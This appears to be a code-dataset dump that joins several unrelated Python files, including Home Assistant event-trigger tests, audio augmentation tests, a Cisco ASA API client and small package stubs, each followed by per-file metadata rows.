"trigger": {
"platform": "event",
"event_type": "test_event",
"event_data": {
"some_attr": "some_value",
"second_attr": "second_value",
},
"context": {"user_id": context_with_user.user_id},
},
"action": {"service": "test.automation"},
}
},
)
hass.bus.async_fire(
"test_event",
{"some_attr": "some_value", "another": "value", "second_attr": "second_value"},
context=context_with_user,
)
await hass.async_block_till_done()
assert len(calls) == 1
hass.bus.async_fire(
"test_event",
{"some_attr": "some_value", "another": "value"},
context=context_with_user,
)
await hass.async_block_till_done()
assert len(calls) == 1 # No new call
hass.bus.async_fire(
"test_event",
{"some_attr": "some_value", "another": "value", "second_attr": "second_value"},
)
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_event_with_templated_data_and_context(
hass, calls, context_with_user
):
"""Test the firing of events with templated data and context."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger_variables": {
"attr_1_val": "milk",
"attr_2_val": "beer",
"user_id": context_with_user.user_id,
},
"trigger": {
"platform": "event",
"event_type": "test_event",
"event_data": {
"attr_1": "{{attr_1_val}}",
"attr_2": "{{attr_2_val}}",
},
"context": {"user_id": "{{user_id}}"},
},
"action": {"service": "test.automation"},
}
},
)
hass.bus.async_fire(
"test_event",
{"attr_1": "milk", "another": "value", "attr_2": "beer"},
context=context_with_user,
)
await hass.async_block_till_done()
assert len(calls) == 1
hass.bus.async_fire(
"test_event",
{"attr_1": "milk", "another": "value"},
context=context_with_user,
)
await hass.async_block_till_done()
assert len(calls) == 1 # No new call
hass.bus.async_fire(
"test_event",
{"attr_1": "milk", "another": "value", "attr_2": "beer"},
)
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_event_with_empty_data_and_context_config(
hass, calls, context_with_user
):
"""Test the firing of events with empty data and context config.
The frontend automation editor can produce configurations with an
empty dict for event_data instead of no key.
"""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "event",
"event_type": "test_event",
"event_data": {},
"context": {},
},
"action": {"service": "test.automation"},
}
},
)
hass.bus.async_fire(
"test_event",
{"some_attr": "some_value", "another": "value"},
context=context_with_user,
)
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_event_with_nested_data(hass, calls):
"""Test the firing of events with nested data."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "event",
"event_type": "test_event",
"event_data": {"parent_attr": {"some_attr": "some_value"}},
},
"action": {"service": "test.automation"},
}
},
)
hass.bus.async_fire(
"test_event", {"parent_attr": {"some_attr": "some_value", "another": "value"}}
)
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_not_fires_if_event_data_not_matches(hass, calls):
"""Test firing of event if no data match."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "event",
"event_type": "test_event",
"event_data": {"some_attr": "some_value"},
},
"action": {"service": "test.automation"},
}
},
)
hass.bus.async_fire("test_event", {"some_attr": "some_other_value"})
await hass.async_block_till_done()
assert len(calls) == 0
async def test_if_not_fires_if_event_context_not_matches(
hass, calls, context_with_user
):
"""Test firing of event if no context match."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "event",
"event_type": "test_event",
"context": {"user_id": "some_user"},
},
"action": {"service": "test.automation"},
}
},
)
hass.bus.async_fire("test_event", {}, context=context_with_user)
await hass.async_block_till_done()
assert len(calls) == 0
async def test_if_fires_on_multiple_user_ids(hass, calls, context_with_user):
"""Test the firing of event when the trigger has multiple user ids."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "event",
"event_type": "test_event",
"event_data": {},
"context": {"user_id": [context_with_user.user_id, "another id"]},
},
"action": {"service": "test.automation"},
}
},
)
hass.bus.async_fire("test_event", {}, context=context_with_user)
await hass.async_block_till_done()
assert len(calls) == 1
async def test_event_data_with_list(hass, calls):
"""Test the (non)firing of event when the data schema has lists."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "event",
"event_type": "test_event",
"event_data": {"some_attr": [1, 2]},
"context": {},
},
"action": {"service": "test.automation"},
}
},
)
hass.bus.async_fire("test_event", {"some_attr": [1, 2]})
await hass.async_block_till_done()
assert len(calls) == 1
# don't match a single value
hass.bus.async_fire("test_event", {"some_attr": 1})
await hass.async_block_till_done()
assert len(calls) == 1
# don't match a containing list
hass.bus.async_fire("test_event", {"some_attr": [1, 2, 3]})
await hass.async_block_till_done()
assert len(calls) == 1
| 29.653659 | 87 | 0.556917 | 1,325 | 12,158 | 4.815849 | 0.087547 | 0.047955 | 0.041373 | 0.055164 | 0.834352 | 0.81821 | 0.785143 | 0.761793 | 0.74283 | 0.724024 | 0 | 0.005786 | 0.317651 | 12,158 | 409 | 88 | 29.726161 | 0.76338 | 0.017273 | 0 | 0.604863 | 0 | 0 | 0.168622 | 0 | 0 | 0 | 0 | 0 | 0.115502 | 1 | 0.009119 | false | 0 | 0.018237 | 0 | 0.033435 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
8ca95d533d0d15abc6108952f1d65ecf31857894 | 1,672 | py | Python | tests/search/SearchQuery.py | Gawaboumga/PyMatex | 3ccc0aa23211a064aa31a9b509b108cd606a4992 | [
"MIT"
] | 1 | 2019-03-05T09:45:04.000Z | 2019-03-05T09:45:04.000Z | tests/search/SearchQuery.py | Gawaboumga/PyMatex | 3ccc0aa23211a064aa31a9b509b108cd606a4992 | [
"MIT"
] | null | null | null | tests/search/SearchQuery.py | Gawaboumga/PyMatex | 3ccc0aa23211a064aa31a9b509b108cd606a4992 | [
"MIT"
] | null | null | null | from tests import BaseTest
from pymatex.search import SearchQuery
class SearchQueryTests(BaseTest.BaseTest):
def test_read(self):
s = SearchQuery(path='tests/search/resources/search-content-simple-tests.txt')
def test_search_simple(self):
s = SearchQuery(path='tests/search/resources/search-content-simple-tests.txt')
results = s.search(r'(ky+o)')
self.assertListEqual(list(map(lambda x: x[0], results)), [2, 1])
def test_search_less_simple(self):
s = SearchQuery(path='tests/search/resources/search-content-simple-tests.txt')
results = s.search(r'(ky+o) * (uy^{2} + vy + n)')
self.assertListEqual(list(map(lambda x: x[0], results)), [1, 2])
def test_search_summation_and_bound_variables(self):
s = SearchQuery(path='tests/search/resources/search-content-summation-tests.txt')
results = s.search(r'\sum_{k=0}^{\infty} k')
self.assertListEqual(list(map(lambda x: x[0], results)), [2, 1])
def test_search_weird_summation_and_fraction(self):
s = SearchQuery(path='tests/search/resources/search-content-weird-summation-tests.txt')
results = s.search(r'\sum_{k=0}^{\infty} k')
self.assertListEqual(list(map(lambda x: x[0], results)), [1, 3, 2])
def test_remove(self):
s = SearchQuery(path='tests/search/resources/search-content-simple-tests.txt')
results = s.search(r'(ky+o) * (uy^{2} + vy + n)')
self.assertListEqual(list(map(lambda x: x[0], results)), [1, 2])
s.remove(1)
results = s.search(r'(ky+o) * (uy^{2} + vy + n)')
self.assertListEqual(list(map(lambda x: x[0], results)), [2])
| 38 | 95 | 0.647727 | 238 | 1,672 | 4.470588 | 0.193277 | 0.039474 | 0.090226 | 0.112782 | 0.798872 | 0.798872 | 0.798872 | 0.798872 | 0.798872 | 0.699248 | 0 | 0.01757 | 0.183014 | 1,672 | 43 | 96 | 38.883721 | 0.761347 | 0 | 0 | 0.464286 | 0 | 0 | 0.276316 | 0.200957 | 0 | 0 | 0 | 0 | 0.214286 | 1 | 0.214286 | false | 0 | 0.071429 | 0 | 0.321429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
8ced868760db7844739902b77e80163d14804aa4 | 39 | py | Python | tests/test_so.py | lazyxu/pythonvm | 8c25acc6ee1e01a0bb65bb35aae987264d6876aa | [
"MIT"
] | null | null | null | tests/test_so.py | lazyxu/pythonvm | 8c25acc6ee1e01a0bb65bb35aae987264d6876aa | [
"MIT"
] | null | null | null | tests/test_so.py | lazyxu/pythonvm | 8c25acc6ee1e01a0bb65bb35aae987264d6876aa | [
"MIT"
] | null | null | null | import libmath
print libmath.add(1, 2) | 13 | 23 | 0.769231 | 7 | 39 | 4.285714 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.058824 | 0.128205 | 39 | 3 | 23 | 13 | 0.823529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.5 | null | null | 0.5 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 6 |
50b01881feff7ab77d41b1e18ec713bff005d8ee | 20 | py | Python | vigobusapi/vigobus_getters/http/__init__.py | David-Lor/Python_VigoBusAPI | 2ba327654908b761b3086be2fec09bfebc6e3029 | [
"Apache-2.0"
] | 4 | 2019-07-18T22:25:31.000Z | 2021-03-09T19:01:14.000Z | vigobusapi/vigobus_getters/http/__init__.py | David-Lor/Python_VigoBusAPI | 2ba327654908b761b3086be2fec09bfebc6e3029 | [
"Apache-2.0"
] | 3 | 2021-09-12T20:15:38.000Z | 2021-09-18T16:35:27.000Z | vigobusapi/vigobus_getters/http/__init__.py | David-Lor/VigoBusAPI | 40db5a644f43a8f98cb40a9e5519a028fe18db14 | [
"Apache-2.0"
] | 3 | 2020-10-03T21:45:39.000Z | 2021-05-06T21:27:03.000Z | from .http import *
| 10 | 19 | 0.7 | 3 | 20 | 4.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2 | 20 | 1 | 20 | 20 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
50bb05784e1ea3caad1078dec01819d01b8b82e3 | 2,770 | py | Python | pycdo/asa_services.py | aaronhackney/pycdo | 0c0b938b74dbc0ab45a1ed7926c2d5e2f8651e7a | [
"MIT"
] | null | null | null | pycdo/asa_services.py | aaronhackney/pycdo | 0c0b938b74dbc0ab45a1ed7926c2d5e2f8651e7a | [
"MIT"
] | 1 | 2022-03-17T22:38:44.000Z | 2022-03-17T22:38:44.000Z | pycdo/asa_services.py | aaronhackney/pycdo | 0c0b938b74dbc0ab45a1ed7926c2d5e2f8651e7a | [
"MIT"
] | null | null | null | from .base import CDOBaseClient
import logging
logger = logging.getLogger(__name__)
class CDOASAServices(CDOBaseClient):
"""Class for performing CDO ASA operations"""
# TODO: Full CRUD operations where available
# TODO: packettracer method(s)
def get_asa_config_summary_list(self):
return self.get_operation(f"{self.PREFIX_LIST['SERVICES']}/asa/configs")
def get_asa_config_summary(self, device_uid):
return self.get_operation(f"{self.PREFIX_LIST['SERVICES']}/asa/configs/{device_uid}")
def get_asa_nats_list(self):
return self.get_operation(f"{self.PREFIX_LIST['SERVICES']}/asa/nats")
def get_asa_nat(self, nat_uid):
return self.get_operation(f"{self.PREFIX_LIST['SERVICES']}/asa/nats/{nat_uid}")
def get_asa_twice_nat_events_list(self):
return self.get_operation(f"{self.PREFIX_LIST['SERVICES']}/asa/twicenatevents")
def get_asa_twice_nat_events(self, twice_nat_uid):
return self.get_operation(f"{self.PREFIX_LIST['SERVICES']}/asa/twicenatevents/{twice_nat_uid}")
def get_asa_exports_list(self):
return self.get_operation(f"{self.PREFIX_LIST['SERVICES']}/asa/exports")
def get_asa_exports(self, export_uid):
return self.get_operation(f"{self.PREFIX_LIST['SERVICES']}/asa/exports/{export_uid}")
def get_asa_templates_list(self):
return self.get_operation(f"{self.PREFIX_LIST['SERVICES']}/asa/templates")
def get_asa_templates(self, template_uid):
return self.get_operation(f"{self.PREFIX_LIST['SERVICES']}/asa/templates/{template_uid}")
def get_asa_debug_events_list(self):
return self.get_operation(f"{self.PREFIX_LIST['SERVICES']}/asa/debugevents")
def get_asa_debug_events(self, events_uid):
return self.get_operation(f"{self.PREFIX_LIST['SERVICES']}/asa/debugevents/{events_uid}")
def get_asa_ordered_nats_list(self, params):
return self.get_operation(f"{self.PREFIX_LIST['SERVICES']}/asa/orderednats", params=params)
def get_asa_ordered_nats(self, ordered_nats_uid, params):
return self.get_operation(f"{self.PREFIX_LIST['SERVICES']}/asa/orderednats/{ordered_nats_uid}", params=params)
def get_asa_configs_exports_list(self):
return self.get_operation(f"{self.PREFIX_LIST['SERVICES']}/asa/configs-exports")
def get_asa_configs_exports(self, configs_exports_uid):
return self.get_operation(f"{self.PREFIX_LIST['SERVICES']}/asa/configs-exports/{configs_exports_uid}")
def get_asa_nat_events_list(self):
return self.get_operation(f"{self.PREFIX_LIST['SERVICES']}/asa/natevents")
def get_asa_nat_events(self, nat_events_uid):
return self.get_operation(f"{self.PREFIX_LIST['SERVICES']}/asa/natevents/{nat_events_uid}")
| 41.969697 | 118 | 0.735379 | 392 | 2,770 | 4.877551 | 0.132653 | 0.056485 | 0.084728 | 0.207113 | 0.762552 | 0.642782 | 0.623431 | 0.623431 | 0.623431 | 0.623431 | 0 | 0 | 0.131047 | 2,770 | 65 | 119 | 42.615385 | 0.79435 | 0.040433 | 0 | 0 | 0 | 0 | 0.355338 | 0.355338 | 0 | 0 | 0 | 0.015385 | 0 | 1 | 0.45 | false | 0 | 0.05 | 0.45 | 0.975 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
0f9c39f1bddc9494f522a489f297ea357d75b02c | 128 | py | Python | mirtorch/__init__.py | guanhuaw/MIRTorch | 535690946d1f105c6d3532c9fbc68cd78307e945 | [
"BSD-3-Clause"
] | 38 | 2021-03-07T21:51:51.000Z | 2022-03-29T09:32:52.000Z | mirtorch/__init__.py | guanhuaw/MIRTorch | 535690946d1f105c6d3532c9fbc68cd78307e945 | [
"BSD-3-Clause"
] | 2 | 2021-09-17T19:52:50.000Z | 2022-03-29T09:32:42.000Z | mirtorch/__init__.py | guanhuaw/MIRTorch | 535690946d1f105c6d3532c9fbc68cd78307e945 | [
"BSD-3-Clause"
] | null | null | null | from mirtorch import prox
from mirtorch import linear
from mirtorch import nn
__all__ = ['linear', 'prox', 'alg', 'nn', 'dic']
| 21.333333 | 48 | 0.710938 | 18 | 128 | 4.833333 | 0.5 | 0.413793 | 0.62069 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.15625 | 128 | 5 | 49 | 25.6 | 0.805556 | 0 | 0 | 0 | 0 | 0 | 0.140625 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.75 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e8556b026e8027d295b775f9d851a8a54cfd4cec | 46 | py | Python | packages/compile-vyper/test/sources/VyperContract3.vyper.py | wbt/truffle | 94e5ce757ef61302288088fbde83e1889385413c | [
"MIT"
] | 24 | 2020-06-19T07:41:25.000Z | 2022-02-15T08:51:10.000Z | packages/compile-vyper/test/sources/VyperContract3.vyper.py | wbt/truffle | 94e5ce757ef61302288088fbde83e1889385413c | [
"MIT"
] | 11 | 2019-04-26T04:05:42.000Z | 2019-08-23T17:27:10.000Z | packages/compile-vyper/test/sources/VyperContract3.vyper.py | wbt/truffle | 94e5ce757ef61302288088fbde83e1889385413c | [
"MIT"
] | 8 | 2020-06-16T11:32:51.000Z | 2022-02-11T09:10:45.000Z | @public
@payable
def vyper_action():
pass
| 9.2 | 19 | 0.695652 | 6 | 46 | 5.166667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.195652 | 46 | 4 | 20 | 11.5 | 0.837838 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0.25 | 0 | 0 | 0.25 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
e89f97b35437e7dd8581422c9fcc71f80a91716f | 31 | py | Python | cosmosdb_sdk/__init__.py | jxjia/cosmos_sdk | be74647f65bed29641c119f842c56510eacbb82a | [
"MIT"
] | null | null | null | cosmosdb_sdk/__init__.py | jxjia/cosmos_sdk | be74647f65bed29641c119f842c56510eacbb82a | [
"MIT"
] | null | null | null | cosmosdb_sdk/__init__.py | jxjia/cosmos_sdk | be74647f65bed29641c119f842c56510eacbb82a | [
"MIT"
] | null | null | null | from .cosmosdb import CosmosDB
| 15.5 | 30 | 0.83871 | 4 | 31 | 6.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129032 | 31 | 1 | 31 | 31 | 0.962963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e8ad77148ce51329d1bd38a91fe48c206e378393 | 106 | py | Python | Code/quote_user.py | UPstartDeveloper/CS-1.2-Intro-Data-Structures | d36ee5ff4496315f07deb748c06afb043bd97c41 | [
"MIT"
] | 1 | 2020-06-05T19:08:45.000Z | 2020-06-05T19:08:45.000Z | Code/quote_user.py | UPstartDeveloper/CS-1.2-Intro-Data-Structures | d36ee5ff4496315f07deb748c06afb043bd97c41 | [
"MIT"
] | 7 | 2019-11-07T03:13:52.000Z | 2019-12-16T16:49:00.000Z | Code/quote_user.py | UPstartDeveloper/adam-smith-tweet-generator | d36ee5ff4496315f07deb748c06afb043bd97c41 | [
"MIT"
] | null | null | null | from python_quote import random_python_quote
if __name__ == "__main__":
print(random_python_quote())
| 21.2 | 44 | 0.783019 | 14 | 106 | 5 | 0.642857 | 0.471429 | 0.485714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.132075 | 106 | 4 | 45 | 26.5 | 0.76087 | 0 | 0 | 0 | 0 | 0 | 0.075472 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0.333333 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
e8b67eeb1e2a34a29fedf28d5f6887297faa596f | 2,620 | py | Python | tests/test_time_mask.py | jeongyoonlee/audiomentations | 7f0112ae310989430e0ef7eb32c4116114810966 | [
"MIT"
] | 930 | 2019-02-14T10:21:22.000Z | 2022-03-31T03:49:48.000Z | tests/test_time_mask.py | jeongyoonlee/audiomentations | 7f0112ae310989430e0ef7eb32c4116114810966 | [
"MIT"
] | 169 | 2019-02-12T21:16:14.000Z | 2022-03-18T07:53:43.000Z | tests/test_time_mask.py | jeongyoonlee/audiomentations | 7f0112ae310989430e0ef7eb32c4116114810966 | [
"MIT"
] | 122 | 2019-02-26T05:12:45.000Z | 2022-03-24T08:45:51.000Z | import unittest
import numpy as np
from audiomentations.augmentations.transforms import TimeMask
from audiomentations.core.composition import Compose
class TestTimeMask(unittest.TestCase):
def test_apply_time_mask(self):
sample_len = 1024
samples_in = np.random.normal(0, 1, size=sample_len).astype(np.float32)
sample_rate = 16000
augmenter = Compose([TimeMask(min_band_part=0.2, max_band_part=0.5, p=1.0)])
samples_out = augmenter(samples=samples_in, sample_rate=sample_rate)
self.assertEqual(samples_out.dtype, np.float32)
self.assertEqual(len(samples_out), sample_len)
std_in = np.mean(np.abs(samples_in))
std_out = np.mean(np.abs(samples_out))
self.assertLess(std_out, std_in)
def test_apply_time_mask_multichannel(self):
sample_len = 1024
samples_in = np.random.normal(0, 1, size=(2, sample_len)).astype(np.float32)
sample_rate = 16000
augmenter = TimeMask(min_band_part=0.2, max_band_part=0.5, p=1.0)
samples_out = augmenter(samples=samples_in, sample_rate=sample_rate)
self.assertEqual(samples_out.dtype, np.float32)
self.assertEqual(samples_out.shape, samples_in.shape)
std_in = np.mean(np.abs(samples_in))
std_out = np.mean(np.abs(samples_out))
self.assertLess(std_out, std_in)
def test_apply_time_mask_with_fade(self):
sample_len = 1024
samples_in = np.random.normal(0, 1, size=sample_len).astype(np.float32)
sample_rate = 16000
augmenter = Compose(
[TimeMask(min_band_part=0.2, max_band_part=0.5, fade=True, p=1.0)]
)
samples_out = augmenter(samples=samples_in, sample_rate=sample_rate)
self.assertEqual(samples_out.dtype, np.float32)
self.assertEqual(len(samples_out), sample_len)
std_in = np.mean(np.abs(samples_in))
std_out = np.mean(np.abs(samples_out))
self.assertLess(std_out, std_in)
def test_apply_time_mask_with_fade_short_signal(self):
sample_len = 100
samples_in = np.random.normal(0, 1, size=sample_len).astype(np.float32)
sample_rate = 16000
augmenter = Compose(
[TimeMask(min_band_part=0.2, max_band_part=0.5, fade=True, p=1.0)]
)
samples_out = augmenter(samples=samples_in, sample_rate=sample_rate)
self.assertEqual(samples_out.dtype, np.float32)
self.assertEqual(len(samples_out), sample_len)
std_in = np.mean(np.abs(samples_in))
std_out = np.mean(np.abs(samples_out))
self.assertLess(std_out, std_in)
| 37.971014 | 84 | 0.682061 | 382 | 2,620 | 4.408377 | 0.15445 | 0.095012 | 0.042755 | 0.052257 | 0.861045 | 0.849169 | 0.849169 | 0.849169 | 0.849169 | 0.820665 | 0 | 0.04058 | 0.209924 | 2,620 | 68 | 85 | 38.529412 | 0.772947 | 0 | 0 | 0.698113 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.226415 | 1 | 0.075472 | false | 0 | 0.075472 | 0 | 0.169811 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e8c643284e5eb0048db5e44deafdd8c3f6ec0e42 | 184 | py | Python | vendor/packages/pylint/test/input/func_w0704.py | jgmize/kitsune | 8f23727a9c7fcdd05afc86886f0134fb08d9a2f0 | [
"BSD-3-Clause"
] | 2 | 2019-08-19T17:08:47.000Z | 2019-10-05T11:37:02.000Z | vendor/packages/pylint/test/input/func_w0704.py | jgmize/kitsune | 8f23727a9c7fcdd05afc86886f0134fb08d9a2f0 | [
"BSD-3-Clause"
] | null | null | null | vendor/packages/pylint/test/input/func_w0704.py | jgmize/kitsune | 8f23727a9c7fcdd05afc86886f0134fb08d9a2f0 | [
"BSD-3-Clause"
] | null | null | null | """test empty except
"""
__revision__ = 1
try:
__revision__ += 1
except TypeError:
pass
try:
__revision__ += 1
except TypeError:
pass
else:
__revision__ = None
| 10.823529 | 24 | 0.641304 | 20 | 184 | 5.1 | 0.5 | 0.264706 | 0.235294 | 0.352941 | 0.607843 | 0.607843 | 0 | 0 | 0 | 0 | 0 | 0.022222 | 0.266304 | 184 | 16 | 25 | 11.5 | 0.733333 | 0.092391 | 0 | 0.727273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.181818 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
2cde165a01180fdf8a58607038b0867e0a8f76b5 | 187 | py | Python | pyclopedia/p02_ref/p03_objective_oriented/p04_magic_method/__init__.py | MacHu-GWU/pyclopedia-project | c6ee156eb40bc5a4ac5f51aa735b6fd004cb68ee | [
"MIT"
] | null | null | null | pyclopedia/p02_ref/p03_objective_oriented/p04_magic_method/__init__.py | MacHu-GWU/pyclopedia-project | c6ee156eb40bc5a4ac5f51aa735b6fd004cb68ee | [
"MIT"
] | null | null | null | pyclopedia/p02_ref/p03_objective_oriented/p04_magic_method/__init__.py | MacHu-GWU/pyclopedia-project | c6ee156eb40bc5a4ac5f51aa735b6fd004cb68ee | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Python2 Doc: https://docs.python.org/2/reference/datamodel.html
Python3.3 Doc: https://docs.python.org/3.3/reference/datamodel.html
"""
| 23.375 | 67 | 0.68984 | 29 | 187 | 4.448276 | 0.62069 | 0.124031 | 0.186047 | 0.27907 | 0.325581 | 0 | 0 | 0 | 0 | 0 | 0 | 0.040936 | 0.085562 | 187 | 7 | 68 | 26.714286 | 0.71345 | 0.930481 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
fa173302ebc414485b9a480ac26c512ed16b1bb6 | 98 | py | Python | tensortrade/features/stationarity/__init__.py | Kukunin/tensortrade | c5b5c40232a334d9b38359eab0c0ce0e4c9e43ed | [
"Apache-2.0"
] | 7 | 2020-09-28T23:36:40.000Z | 2022-02-22T02:00:32.000Z | tensortrade/features/stationarity/__init__.py | Kukunin/tensortrade | c5b5c40232a334d9b38359eab0c0ce0e4c9e43ed | [
"Apache-2.0"
] | 4 | 2020-11-13T18:48:52.000Z | 2022-02-10T01:29:47.000Z | tensortrade/features/stationarity/__init__.py | Kukunin/tensortrade | c5b5c40232a334d9b38359eab0c0ce0e4c9e43ed | [
"Apache-2.0"
] | 3 | 2020-11-23T17:31:59.000Z | 2021-04-08T10:55:03.000Z | from .log_difference import LogDifference
from .fractional_difference import FractionalDifference
| 32.666667 | 55 | 0.897959 | 10 | 98 | 8.6 | 0.7 | 0.372093 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.081633 | 98 | 2 | 56 | 49 | 0.955556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
fa33f54f0859d7a3c7f734437589b77eefe5d3b4 | 135 | py | Python | kaptos/config.py | VA7EXE/kaptos | 88de0969796b0467970dd553158e7b9fc5698070 | [
"MIT"
] | 1 | 2019-11-29T22:53:44.000Z | 2019-11-29T22:53:44.000Z | kaptos/config.py | VA7EXE/kaptos | 88de0969796b0467970dd553158e7b9fc5698070 | [
"MIT"
] | 2 | 2020-03-07T21:49:29.000Z | 2021-03-10T10:39:20.000Z | kaptos/config.py | VA7EXE/kaptos | 88de0969796b0467970dd553158e7b9fc5698070 | [
"MIT"
] | 2 | 2019-01-27T10:53:26.000Z | 2019-11-29T22:27:01.000Z | """Kaptos configuration module."""
import appdirs
import toml
config = toml.load(f"{appdirs.user_config_dir('kaptos')}/config.toml")
